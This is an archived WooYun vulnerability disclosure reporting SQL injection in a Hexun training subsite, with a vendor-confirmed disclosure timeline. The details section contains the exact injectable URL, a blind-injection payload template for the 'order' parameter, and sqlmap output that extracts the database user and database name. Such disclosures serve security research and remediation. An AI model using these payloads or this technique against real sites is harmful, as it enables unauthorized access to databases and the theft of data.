当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092197

漏洞标题:和讯网另一分站存在SQL注入漏洞(多个参数)

相关厂商:和讯网

漏洞作者: greg.wu

提交时间:2015-01-16 12:51

修复时间:2015-03-02 12:52

公开时间:2015-03-02 12:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-16: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-02: 细节向公众公开

简要描述:

直接在url参数中传sql语句,对于这种行为,我只能说:逗逼!

详细说明:

注入点:
http://px.hexun.com/ajaxpage/responsepage.aspx?func=GetProductList&condition=%20and%20a.ClassID%20not%20in%20%28select%20classid%20From%20dbo.PXPT_ClassSection%20where%20IsDelete%20=%200%29%20&order=a.goodrate&pageindex=1&pagesize=8&_=1421381414007
很明显的,condition传的就是赤果果的ms sql 语句,前面或者后面加个盲注语句就可以跑数据了
另一个参数,order也存在注入,构造一下payload:order=case when 1=1 * then a.goodrate else 100 end ,星号处放盲注语句就可以跑数据了

漏洞证明:

sqlmap跑个用户当前库看看
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://px.hexun.com:80/ajaxpage/responsepage.aspx?func=GetProductList&condition= and a.ClassID not in (select classid From dbo.PXPT_ClassSection where IsDelete = 0) AND 9023=9023&order=a.goodrate&pageindex=1&pagesize=8&_=1421381414007
---
[04:24:51] [INFO] testing Microsoft SQL Server
[04:24:51] [INFO] confirming Microsoft SQL Server
[04:24:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319, Nginx
back-end DBMS: Microsoft SQL Server 2005
[04:24:53] [INFO] fetching current user
[04:24:53] [INFO] resumed: vipuser
current user: 'vipuser'
[04:24:53] [INFO] fetching current database
[04:24:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:24:53] [INFO] retrieved:
[04:24:55] [WARNING] reflective value(s) found and filtering out
DB_APP
current database: 'DB_APP'

修复方案:

你更懂

版权声明:转载请注明来源 greg.wu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-16 12:52

厂商回复:

处理中

最新状态:

暂无


漏洞评价:

评论